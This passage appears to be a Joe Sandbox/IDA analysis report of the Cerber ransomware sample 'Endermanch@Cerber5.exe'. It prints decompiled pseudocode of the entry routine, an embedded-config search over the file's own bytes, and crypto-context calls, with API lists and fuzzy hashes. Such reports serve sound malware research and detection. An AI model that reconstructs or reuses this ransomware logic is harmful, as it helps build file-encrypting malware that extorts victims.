                                                                                                                                                                                        												_v5 = 1;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        									E004054A9(_v12, _t84);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								CryptDestroyKey(_t105);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						return _v5;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x42f79c = 1;
                                                                                                                                                                                        					_t79 = E00405905(0x40d190, 0x10, 0x155a4e43);
                                                                                                                                                                                        					_t119 = _t119 + 0xc;
                                                                                                                                                                                        					_t82 = E00403253(E004031AF(_t83, _t128, _t79), _t128);
                                                                                                                                                                                        					 *0x42f798 = _t82;
                                                                                                                                                                                        					if(_t82 == 0) {
                                                                                                                                                                                        						L7:
                                                                                                                                                                                        						 *0x42f798 = 2;
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t130 = _t82 - 5;
                                                                                                                                                                                        					if(_t82 <= 5) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrChrW.SHLWAPI(00000000,0000002D,00000000,?,00000000,?,?,00000000), ref: 0040B591
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(?,00000000,00000001,?,00000000,?,?,00000000), ref: 0040B5AF
                                                                                                                                                                                          • Part of subcall function 0040B53E: GetTempPathW.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,?,00000000), ref: 0040B5C0
                                                                                                                                                                                          • Part of subcall function 0040B53E: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?), ref: 0040B5CE
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrChrW.SHLWAPI(-00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5DA
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(68f6,-00000002,00000001,?,00000000,?,?,00000000), ref: 0040B5F2
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5FE
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(4e9a,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B616
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B622
                                                                                                                                                                                          • Part of subcall function 0040B53E: StrCpyNW.SHLWAPI(955c,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B638
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 00402ABC
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptDestroyPathTemplstrcatlstrcmpi
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 74468174-0
                                                                                                                                                                                        • Opcode ID: 624e2ffc4e37d3f0dca818b73105c8e9306749f5056d15b30d797cfe2bb4428b
                                                                                                                                                                                        • Instruction ID: 61159875388271f52669120d72e273ac9903c895f200c47806f8b7d26bb41935
                                                                                                                                                                                        • Opcode Fuzzy Hash: 624e2ffc4e37d3f0dca818b73105c8e9306749f5056d15b30d797cfe2bb4428b
                                                                                                                                                                                        • Instruction Fuzzy Hash: A97107B1F003006AD720BFB5AD46B0A3BA89B54358F55547FF408FA2C3EABC89094B5D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(0042FAF8,00000000,00000000,00000001,F0000000,0040B260,004029D6,?,00402726,00000000,004029D6,80C426C8,?,00000000), ref: 0040B134
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AcquireContextCrypt
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3951991833-0
                                                                                                                                                                                        • Opcode ID: 93ff10940dc78446d8b252e0d1ce091bdab675856b45d7ea9a61a66c548ef40d
                                                                                                                                                                                        • Instruction ID: 7677ceff8f67063ce42918aba9d83e89620582dd31fa1a4ed98665aecb77ad59
                                                                                                                                                                                        • Opcode Fuzzy Hash: 93ff10940dc78446d8b252e0d1ce091bdab675856b45d7ea9a61a66c548ef40d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 37D00230750351AAE73057209D46F0533615754B55FF1553571657C4D0D6F914C9870D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(0042FAF0,00000000,00000000,00000001,F0000000,0040AD93,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040AD7A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AcquireContextCrypt
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3951991833-0
                                                                                                                                                                                        • Opcode ID: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
                                                                                                                                                                                        • Instruction ID: 71168021d763e1e7dcbc7070406abf6f585069e42b9707890cf07a7ddbdd7918
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3fc643ef2366b6010b80a73a582ea71f5e7443e240881e435b80748d053974
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BC04C70750252AEEF309720AD46F353779A724F01FF04631F90AEA990D2F6688D8A5D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(0042FAF4,00000000,00000000,00000001,F0000000,0040AF9C), ref: 0040AF81
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AcquireContextCrypt
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3951991833-0
                                                                                                                                                                                        • Opcode ID: 8d709e34f905b3d1e9b39c812c95413ebbe30c8aa965ca7d14b7af5c535f36fe
                                                                                                                                                                                        • Instruction ID: fd4e9b65beb9a6c72a0c5c93a7397172f72b61858c70e9ec66c350d9c8736119
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d709e34f905b3d1e9b39c812c95413ebbe30c8aa965ca7d14b7af5c535f36fe
                                                                                                                                                                                        • Instruction Fuzzy Hash: 51C04CB0754252AEEF34A720EF45F313778B304701FF00631BD09E9990D1F658898A1D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                        			_entry_() {
                                                                                                                                                                                        				char _v404;
                                                                                                                                                                                        				short _v684;
                                                                                                                                                                                        				void _v890;
                                                                                                                                                                                        				char _v892;
                                                                                                                                                                                        				intOrPtr _v912;
                                                                                                                                                                                        				char* _v916;
                                                                                                                                                                                        				intOrPtr _v928;
                                                                                                                                                                                        				intOrPtr _v948;
                                                                                                                                                                                        				char* _v952;
                                                                                                                                                                                        				void _v976;
                                                                                                                                                                                        				struct tagOFNA _v980;
                                                                                                                                                                                        				char _v984;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(_t61);
                                                                                                                                                                                        				_v984 = 0;
                                                                                                                                                                                        				memset( &_v976, 0, 0x54);
                                                                                                                                                                                        				_v892 = 0;
                                                                                                                                                                                        				_v980 = 0x58;
                                                                                                                                                                                        				memset( &_v890, 0, 0xc8);
                                                                                                                                                                                        				_v952 =  &_v892;
                                                                                                                                                                                        				_v916 =  &_v984;
                                                                                                                                                                                        				_v948 = 0x64;
                                                                                                                                                                                        				_v928 = 0x20;
                                                                                                                                                                                        				_v912 = E004066BB;
                                                                                                                                                                                        				GetOpenFileNameW( &_v980); // executed
                                                                                                                                                                                        				if(_v984 != 0) {
                                                                                                                                                                                        					SetErrorMode(0x8007); // executed
                                                                                                                                                                                        					E00402EFB(_t53, _t54, _t61, 0,  &_v684);
                                                                                                                                                                                        					CreateMutexW(0, 0,  &_v684); // executed
                                                                                                                                                                                        					_t32 = GetLastError();
                                                                                                                                                                                        					__eflags = _t32 - 0xb7;
                                                                                                                                                                                        					if(_t32 == 0xb7) {
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						ExitProcess( *0x40fc78);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x42f838 = GetModuleHandleA(0);
                                                                                                                                                                                        					GetModuleFileNameW(0, "C:\Users\engineer\AppData\Local\Temp\Endermanch@Cerber5.exe", 0x104);
                                                                                                                                                                                        					_t62 = E00401270();
                                                                                                                                                                                        					__eflags = _t62;
                                                                                                                                                                                        					if(_t62 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00406C8C(_t62); // executed
                                                                                                                                                                                        					_pop(_t56);
                                                                                                                                                                                        					_t38 = E004027DD(_t56, _t60, __eflags, _t62); // executed
                                                                                                                                                                                        					_pop(_t57);
                                                                                                                                                                                        					__eflags = _t38;
                                                                                                                                                                                        					if(_t38 == 0) {
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t39 = E00406005(_t57); // executed
                                                                                                                                                                                        					 *0x42fa54 = _t39;
                                                                                                                                                                                        					 *0x42fa58 = _t39;
                                                                                                                                                                                        					__eflags = _t39 - 0x3000;
                                                                                                                                                                                        					if(__eflags >= 0) {
                                                                                                                                                                                        						E0040186A(_t53, _t57, _t60, _t62, __eflags, _t62); // executed
                                                                                                                                                                                        						_pop(_t57);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x40e00c(0x202,  &_v404); // executed
                                                                                                                                                                                        					 *0x42f834 = CreateEventW(0, 1, 0, 0); // executed
                                                                                                                                                                                        					_t43 = CreateThread(0, 0, 0x406488, 0, 0, 0); // executed
                                                                                                                                                                                        					_t66 = _t43;
                                                                                                                                                                                        					E00406598(_t62, _t57, _t60, _t66, __eflags); // executed
                                                                                                                                                                                        					WaitForSingleObject(_t66, 0xffffffff);
                                                                                                                                                                                        					CloseHandle(_t66);
                                                                                                                                                                                        					CloseHandle( *0x42f834);
                                                                                                                                                                                        					E004082AB(_t53, _t57, _t60, _t62, __eflags, _t62); // executed
                                                                                                                                                                                        					E00403085(__eflags, _t62);
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}






























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.NTDLL ref: 0040670C
                                                                                                                                                                                        • memset.NTDLL ref: 0040672E
                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32 ref: 00406763
                                                                                                                                                                                        • SetErrorMode.KERNEL32(00008007), ref: 0040677C
                                                                                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040679A
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004067A0
                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 004067B2
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,00000104), ref: 004067C8
                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0040681D
                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406828
                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00406488,00000000,00000000,00000000), ref: 0040683D
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040684F
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00406856
                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00406862
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040687E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateHandle$CloseErrorFileModuleNamememset$EventExitLastModeMutexObjectOpenProcessSingleStartupThreadWait
                                                                                                                                                                                        • String ID: $C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe$X$d
                                                                                                                                                                                        • API String ID: 489344662-1372600133
                                                                                                                                                                                        • Opcode ID: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
                                                                                                                                                                                        • Instruction ID: 660d1c7cf976cc34eab42097ed30c14822809f0425eed3060e2e2b5ec831864e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3828e64078428d27c5953f10f8617a0063ac8bdc38d5cb021f34b4e167a3d876
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6541AC32005310AFD320AB61ED4DE9F7BA8EF86765F00453EF045E61E0DB788549CBAA
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E00406C8C(intOrPtr _a4) {
                                                                                                                                                                                        				char _v5;
	signed int _v12;
	DWORD* _v16;
	void* _v20;
	void* _v24;
	char _v56;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	void* _t70;
	void* _t71;
	void* _t72;
	signed int _t74;
	intOrPtr _t79;
	void* _t80;
	signed int _t82;
	void* _t97;
	void* _t101;
	void* _t103;
	void* _t106;
	char* _t108;
	void* _t109;
	void* _t110;
	void* _t112;
	void* _t115;
	long _t117;
	intOrPtr* _t120;
	void* _t122;
	signed int _t127;
	signed int _t130;
	void* _t135;
	DWORD* _t138;
	signed int _t139;
	signed int _t140;
	void* _t146;
	void* _t147;
	void* _t148;
	signed int _t150;
	signed int _t152;
	void* _t153;
	void* _t154;
	void* _t156;
	void* _t157;
	signed int _t187;
	void* _t189;
	void* _t190;
	intOrPtr _t191;

	_v5 = 0;
	_t70 = CreateFileW("C:\Users\engineer\AppData\Local\Temp\Endermanch@Cerber5.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
	_v20 = _t70;
	if(_t70 == 0xffffffff) {
		L13:
		_t71 = CreateFileW("C:\Users\engineer\AppData\Local\Temp\Endermanch@Cerber5.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
		_t148 = _t71;
		_v16 = _t148;
		if(_t148 != 0xffffffff) {
			_t101 = CreateFileMappingW(_t148, 0, 2, 0, 0, 0); // executed
			_v20 = _t101;
			if(_t101 != 0) {
				_t103 = MapViewOfFile(_t101, 4, 0, 0, 0); // executed
				_t146 = _t103;
				if(_t146 != 0) {
					_t106 = GetFileSize(_t148, 0) + 0xfffffef6;
					_t153 = 0;
					_v24 = _t106;
					if(_t106 > 0) {
						do {
							_t108 = _t153 + _t146;
							if( *_t108 != 0x4c ||  *((char*)(_t153 + _t146 + 1)) != 0x82 ||  *((char*)(_t153 + _t146 + 2)) != 0xf3 ||  *((char*)(_t153 + _t146 + 3)) != 0x75 ||  *((char*)(_t153 + _t146 + 4)) != 0xf9 ||  *((char*)(_t153 + _t146 + 5)) != 0x76 ||  *((char*)(_t153 + _t146 + 6)) != 0x1f ||  *((char*)(_t153 + _t146 + 7)) != 0x51 ||  *((char*)(_t153 + _t146 + 8)) != 0xa) {
								goto L28;
							} else {
								_t183 =  *((char*)(_t153 + _t146 + 9)) - 0xc6;
								if( *((char*)(_t153 + _t146 + 9)) != 0xc6) {
									goto L28;
								} else {
									_push(_a4);
									_t47 = _t108 + 0x10a; // -4294966764
									_t153 = _t153 + 0xa; // executed
									_t109 = E00406A35(0, _t47, _t139, _t146, _t153, _t183); // executed
									if(_t109 == 0) {
										goto L28;
									}
								}
							}
							goto L29;
							L28:
							_t153 = _t153 + 1;
							_t185 = _t153 - _v24;
						} while (_t153 < _v24);
					}
					L29:
					UnmapViewOfFile(_t146);
				}
				FindCloseChangeNotification(_v20); // executed
			}
			CloseHandle(_v16);
		}
	} else {
		_t110 = CreateFileMappingW(_t70, 0, 2, 0, 0, 0); // executed
		_v24 = _t110;
		if(_t110 != 0) {
			_t112 = MapViewOfFile(_t110, 4, 0, 0, 0); // executed
			_t147 = _t112;
			if(_t147 != 0) {
				_t115 =  *((intOrPtr*)(_t147 + 0x3c)) + _t147;
				_t139 =  *(_t115 + 6) & 0x0000ffff;
				_t135 = ( *(_t115 + 0x14) & 0x0000ffff) + _t115 + 0x18;
				_t154 = 0;
				_v16 = 0;
				if(0 < _t139) {
					_t120 = _t135 + 0x14;
					_v12 = _t139;
					do {
						_t138 =  *_t120;
						if(_t138 > _v16) {
							_v16 = _t138;
							_t154 =  *((intOrPtr*)(_t120 - 4)) + _t138;
						}
						_t120 = _t120 + 0x28;
						_t15 =  &_v12;
						 *_t15 = _v12 - 1;
					} while ( *_t15 != 0);
				}
				_t117 = GetFileSize(_v20, 0);
				_t168 = _t117 - _t154;
				if(_t117 > _t154) {
					_push(_a4);
					_v5 = E00406A35(0, _t147 + _t117, _t139, _t147, _t154, _t168);
				}
				UnmapViewOfFile(_t147);
			}
			FindCloseChangeNotification(_v24); // executed
		}
		CloseHandle(_v20);
		if(_v5 == 0) {
			goto L13;
		}
	}
	_t72 = E00405905( &E0040D460, 7, 0xa798abfa);
	_t157 = _t156 + 0xc;
	_t74 = E004031AF(_a4, _t185, _t72);
	_pop(_t122);
	_v16 = _t74;
	if(_t74 != 0) {
		_t187 =  *0x42fa48; // 0x63dd7a0
		if(_t187 == 0) {
			_t97 = E00405905( &E0040D468, 3, 0xd0d06399);
			_t157 = _t157 + 0xc;
			_t74 = E0040596B(E004032B8(E004031AF(_v16, _t187, _t97), _t187));
			_pop(_t122);
			 *0x42fa48 = _t74;
		}
		_t140 =  *0x42f83c; // 0x5ed4420
		if(_t140 != 0) {
			__eflags =  *0x42fa4c - 5;
			if(__eflags < 0) {
				_t80 = 0x14;
				 *0x42f83c = E004053CA(_t80, _t122, _t140);
				_t74 =  *0x42fa4c; // 0x5
				__eflags = _t74 - 5;
				if(__eflags < 0) {
					_t150 = _t74 << 2;
					_t82 = _t74 + 1;
					__eflags = _t82;
					_v12 = _t82;
					do {
						_push(_v12);
						wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
						_t157 = _t157 + 0x18;
						_t74 = E0040596B(E004032B8(E004031AF(_v16, __eflags,  &_v56), __eflags));
                                                                                                                                                                                        									 *0x42fa4c =  *0x42fa4c + 1;
                                                                                                                                                                                        									_v12 = _v12 + 1;
                                                                                                                                                                                        									_t127 =  *0x42f83c; // 0x5ed4420
                                                                                                                                                                                        									 *(_t150 + _t127) = _t74;
                                                                                                                                                                                        									_t150 = _t150 + 4;
                                                                                                                                                                                        									__eflags = _v12 - 6;
                                                                                                                                                                                        								} while (__eflags < 0);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_push(0x14);
                                                                                                                                                                                        						 *0x42fa4c = 5;
                                                                                                                                                                                        						_t74 = E004053B4(_t122);
                                                                                                                                                                                        						_t152 = 1;
                                                                                                                                                                                        						 *0x42f83c = _t74;
                                                                                                                                                                                        						_t189 =  *0x42fa4c - _t152; // 0x5
                                                                                                                                                                                        						if(_t189 >= 0) {
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_push(_t152);
                                                                                                                                                                                        								wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
                                                                                                                                                                                        								_t157 = _t157 + 0x18;
                                                                                                                                                                                        								_t74 = E0040596B(E004032B8(E004031AF(_v16, _t189,  &_v56), _t189));
                                                                                                                                                                                        								_t130 =  *0x42f83c; // 0x5ed4420
                                                                                                                                                                                        								 *(_t130 + _t152 * 4 - 4) = _t74;
                                                                                                                                                                                        								_t152 = _t152 + 1;
                                                                                                                                                                                        								_t190 = _t152 -  *0x42fa4c; // 0x5
                                                                                                                                                                                        							} while (_t190 <= 0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t191 =  *0x42fa50; // 0x5ed3e18
                                                                                                                                                                                        					if(_t191 == 0) {
                                                                                                                                                                                        						_t79 = E0040596B(E004032B8(E004031AF(_v16, _t191, E00405905(0x40d474, 4, 0x8969c48e)), _t191));
                                                                                                                                                                                        						 *0x42fa50 = _t79;
                                                                                                                                                                                        						return _t79;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t74;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x00406f91
                                                                                                                                                                                        0x00406f97
                                                                                                                                                                                        0x00406f9b
                                                                                                                                                                                        0x00406fa1
                                                                                                                                                                                        0x00406fa4
                                                                                                                                                                                        0x00406fa7
                                                                                                                                                                                        0x00406fa7
                                                                                                                                                                                        0x00406f52
                                                                                                                                                                                        0x00406f47
                                                                                                                                                                                        0x00406ead
                                                                                                                                                                                        0x00406ead
                                                                                                                                                                                        0x00406eb0
                                                                                                                                                                                        0x00406eba
                                                                                                                                                                                        0x00406ec1
                                                                                                                                                                                        0x00406ec2
                                                                                                                                                                                        0x00406ec7
                                                                                                                                                                                        0x00406ecd
                                                                                                                                                                                        0x00406ed3
                                                                                                                                                                                        0x00406ed3
                                                                                                                                                                                        0x00406eed
                                                                                                                                                                                        0x00406ef6
                                                                                                                                                                                        0x00406f0b
                                                                                                                                                                                        0x00406f11
                                                                                                                                                                                        0x00406f17
                                                                                                                                                                                        0x00406f1b
                                                                                                                                                                                        0x00406f1c
                                                                                                                                                                                        0x00406f1c
                                                                                                                                                                                        0x00406f24
                                                                                                                                                                                        0x00406ecd
                                                                                                                                                                                        0x00406fad
                                                                                                                                                                                        0x00406fb3
                                                                                                                                                                                        0x00406fdb
                                                                                                                                                                                        0x00406fe1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00406fe1
                                                                                                                                                                                        0x00406fb3
                                                                                                                                                                                        0x00406fea

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000), ref: 00406CAB
                                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406CC4
                                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406CD7
                                                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00406D21
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00406D3B
                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 00406D44
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406D4D
                                                                                                                                                                                        • CreateFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D6D
                                                                                                                                                                                        • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406D88
                                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406D9F
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406DB1
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00406E29
                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 00406E32
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406E3B
                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406EED
                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406F6E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, xrefs: 00406CA3, 00406D68
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$CloseCreateView$ChangeFindHandleMappingNotificationSizeUnmapwsprintf
                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                        • API String ID: 3344029107-2487945927
                                                                                                                                                                                        • Opcode ID: 1ec79b66cdb06aa3eeed9b5842f08f8950d5fbb49eff9659b7f10604049a1d1b
                                                                                                                                                                                        • Instruction ID: 80c9848988a0ecdc918146eb7a2068c8117d091857d02b7a82775880087cebb1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ec79b66cdb06aa3eeed9b5842f08f8950d5fbb49eff9659b7f10604049a1d1b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A1E2B1D00205BFDB20ABA4EC85A6FBBB8EB04319F11457EF506F72D1D6388D598B58
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                        			E004078F0(char* __eax, void* __ecx, signed int __edx, intOrPtr* _a4) {
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				char _v35;
                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                        				char _v47;
                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                        				char _v59;
